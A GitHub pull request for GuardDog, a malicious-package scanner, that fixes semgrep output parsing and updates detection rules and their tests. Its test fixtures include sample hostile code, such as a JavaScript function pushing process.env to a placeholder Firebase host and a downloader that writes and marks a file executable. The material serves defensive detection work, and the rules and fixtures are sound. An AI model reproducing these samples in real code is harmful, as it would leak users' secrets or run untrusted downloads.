Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix the output parsing on the latest semgrep tool #517

Open
wants to merge 4 commits into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
39 changes: 35 additions & 4 deletions guarddog/analyzer/analyzer.py
Original file line number Diff line number Diff line change
Expand Up @@ -333,15 +333,19 @@ def _format_semgrep_response(self, response, rule=None, targetpath=None):

for result in response["results"]:
rule_name = rule or result["check_id"].split(".")[-1]
code_snippet = result["extra"]["lines"]
line = result["start"]["line"]
start_line = result["start"]["line"]
end_line = result["end"]["line"]

file_path = os.path.abspath(result["path"])
code = self.trim_code_snippet(
self.get_snippet(
file_path=file_path, start_line=start_line, end_line=end_line
)
)
if targetpath:
file_path = os.path.relpath(file_path, targetpath)

location = file_path + ":" + str(line)
code = self.trim_code_snippet(code_snippet)
location = file_path + ":" + str(start_line)

finding = {
'location': location,
Expand All @@ -356,6 +360,33 @@ def _format_semgrep_response(self, response, rule=None, targetpath=None):

return results

def get_snippet(self, file_path: str, start_line: int, end_line: int) -> str:
"""
Returns the code snippet between start_line and stop_line in a file

Args:
path (str): path to file
start_line (int): starting line number
end_line (int): ending line number

Returns:
str: code snippet
"""
snippet = []
try:
with open(file_path, 'r') as file:
for current_line_number, line in enumerate(file, start=1):
ikretz marked this conversation as resolved.
Show resolved Hide resolved
if start_line <= current_line_number <= end_line:
snippet.append(line)
elif current_line_number > end_line:
break
except FileNotFoundError:
log.error(f"File not found: {file_path}")
except Exception as e:
log.error(f"Error reading file {file_path}: {str(e)}")

return ''.join(snippet)

# Makes sure the matching code to be displayed isn't too long
def trim_code_snippet(self, code):
THRESHOLD = 250
Expand Down
18 changes: 11 additions & 7 deletions guarddog/analyzer/sourcecode/dll-hijacking.yml
Original file line number Diff line number Diff line change
Expand Up @@ -62,11 +62,17 @@ rules:
- patterns:
# write a library to disk
- patterns:
- pattern: |
...
open($DLL,'wb')
...
$FN(...,$EXE,...)
- pattern-either:
- pattern: |
...
with open($DLL,'wb') as $FILE:
...
$FN(...,$EXE,...)
- pattern: |
...
$FILE = open($DLL,'wb')
...
$FN(...,$EXE,...)
- metavariable-pattern:
metavariable: $EXE
patterns:
Expand All @@ -82,5 +88,3 @@ rules:
- focus-metavariable: $DLL

severity: WARNING
options:
symbolic_propagation: true
12 changes: 10 additions & 2 deletions guarddog/analyzer/sourcecode/download-executable.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,10 @@ rules:
- pattern-either:
- pattern: (...).urlretrieve(...,$EXE)
- pattern: open($EXE, ...).write($REQUEST)
- pattern: |
$FILE = open($EXE, ...)
...
$FILE.write($REQUEST)
- pattern: |
with open($EXE, ...) as $FILE:
...
Expand All @@ -30,6 +34,12 @@ rules:
...
$MAKE_EXEC

- pattern: |
$FILE = open($LOC, ...)
...
$FILE.write($REQUEST)
...
$MAKE_EXEC
- pattern: |
open($LOC, ...).write($REQUEST)
...
Expand Down Expand Up @@ -93,5 +103,3 @@ rules:
requests.get(...)
...
severity: WARNING
options:
symbolic_propagation: true
2 changes: 0 additions & 2 deletions guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
Original file line number Diff line number Diff line change
Expand Up @@ -86,5 +86,3 @@ rules:
- focus-metavariable: $DLL

severity: WARNING
options:
symbolic_propagation: true
Original file line number Diff line number Diff line change
Expand Up @@ -84,12 +84,14 @@ rules:
- pattern: $HTTP. ... .request(...)
- pattern: $HTTP. ... .get(...)
- pattern: $HTTP. ... .post(...)
- pattern: $HTTP. ... .push(...)
- pattern: |
$FIRE=$HTTP.child(...)
...
$FIRE.push(...)
- pattern: $HTTP. ... .write(...)
- pattern: $HTTP(...)
languages:
- javascript
- typescript
severity: WARNING
options:
symbolic_propagation: true

2 changes: 0 additions & 2 deletions guarddog/analyzer/sourcecode/npm-obfuscation.yml
Original file line number Diff line number Diff line change
Expand Up @@ -60,5 +60,3 @@ rules:
languages:
- javascript
severity: WARNING
options:
symbolic_propagation: true
30 changes: 15 additions & 15 deletions poetry.lock

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

2 changes: 1 addition & 1 deletion pyproject.toml
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@ guarddog = "guarddog.cli:cli"

[tool.poetry.dependencies]
python = ">=3.10,<4"
semgrep = "1.97.0"
semgrep = "^1.102.0"
requests = "^2.29.0"
python-dateutil = "^2.8.2"
click = "^8.1.3"
Expand Down
2 changes: 1 addition & 1 deletion tests/analyzer/sourcecode/download-executable.py
Original file line number Diff line number Diff line change
Expand Up @@ -29,8 +29,8 @@ def f():
connection.request("GET", PATH)
response = connecton.getresponse().read()
os.chdir(os.path.expanduser("~"))
d = open(LOC, "wb")
# ruleid: download-executable
d = open(LOC, "wb")
d.write(response)
d.close()
current_state = os.stat(LOC)
Expand Down
4 changes: 2 additions & 2 deletions tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
Original file line number Diff line number Diff line change
Expand Up @@ -66,17 +66,17 @@ function f(){
function f(){
var Firebase = require("firebase");
var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/");
var dbRef = ref.child("env_vars");
// ruleid: npm-exfiltrate-sensitive-data
var dbRef = ref.child("env_vars");

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Quality Violation

Unexpected var, use let or const instead. (...read more)

Block scoped lexical declarations like let and const are preferred over var. Block scope is common in many other programming languages and helps programmers avoid mistakes.

View in Datadog  Leave us feedback  Documentation

dbRef.push({status : "leaked env vars", message : process.env}, clean());

}

function f(){
var Firebase = require("firebase");
var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/");
var dbRef = ref.child("env_vars");
// ok: npm-exfiltrate-sensitive-data
var dbRef = ref.child("env_vars");
dbRef.push({status : "leaked env vars", message : "anymsg"}, clean());

}
Expand Down
106 changes: 97 additions & 9 deletions tests/core/test_sourcecode_analyzer.py
Original file line number Diff line number Diff line change
@@ -1,22 +1,110 @@
from guarddog import ecosystems
from guarddog.analyzer.analyzer import Analyzer
import json
from unittest.mock import mock_open, patch

import pytest

from guarddog import ecosystems
from guarddog.analyzer.analyzer import Analyzer

pypi_analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI)
npm_analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.NPM)


@pytest.mark.parametrize(
"analyzer",
[
(pypi_analyzer),
(npm_analyzer),
],
)
"analyzer",
[
(pypi_analyzer),
(npm_analyzer),
],
)
def test_source_code_analyzer_ran_with_no_rules(analyzer: Analyzer):
"""
Regression test for https://github.com/DataDog/guarddog/issues/161
"""
analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI)

result = analyzer.analyze_sourcecode("/tmp", set())
assert len(result['errors']) == 0
assert len(result["errors"]) == 0


def test_source_code_analyzer_format():
analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI)

file_content = "line 1 content\nline 2 content\nline 3 content\nline 4 content\nline 5 content\n"
expected_snippet = "line 2 content\nline 3 content\nline 4 content\n"
# Sample output from semgrep
sample_output = """
{
"version": "1.0.0",
"results": [
{
"check_id": "guarddog.analyzer.sourcecode.sample_rule",
"path": "/tmp/sample.py",
"start": {
"line": 2
},
"end": {
"line": 4
},
"extra": {
"message": "message",
"metadata": {
"description": "description"
},
"severity": "WARNING"
}
}
],
"errors": [],
"paths": {
"scanned": [
"/tmp/sample.py"
]
},
"skipped_rules": []
}
"""

with patch("builtins.open", mock_open(read_data=file_content)):
output = analyzer._format_semgrep_response(json.loads(sample_output))
assert output.get("sample_rule")[0].get("code") == expected_snippet


def test_get_snippet_valid_range():
analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI)
path = "/tmp/sample.py"
start_line = 2
stop_line = 4
file_content = "line 1 content\nline 2 content\nline 3 content\nline 4 content\nline 5 content\n"
expected_snippet = "line 2 content\nline 3 content\nline 4 content\n"

with patch("builtins.open", mock_open(read_data=file_content)):
snippet = analyzer.get_snippet(path, start_line, stop_line)

assert snippet == expected_snippet

ikretz marked this conversation as resolved.
Show resolved Hide resolved

def test_get_snippet_out_of_range():
analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI)
path = "/tmp/sample.py"
start_line = 10
stop_line = 20
file_content = "line 1 content\nline 2 content\nline 3 content\nline 4 content\nline 5 content\n"
expected_snippet = ""

with patch("builtins.open", mock_open(read_data=file_content)):
snippet = analyzer.get_snippet(path, start_line, stop_line)

assert snippet == expected_snippet


def test_get_snippet_file_not_found():
analyzer = Analyzer(ecosystem=ecosystems.ECOSYSTEM.PYPI)
path = "/tmp/non_existent_file.py"
start_line = 2
stop_line = 4

with patch("builtins.open", side_effect=FileNotFoundError):
snippet = analyzer.get_snippet(path, start_line, stop_line)

assert snippet == ""
Loading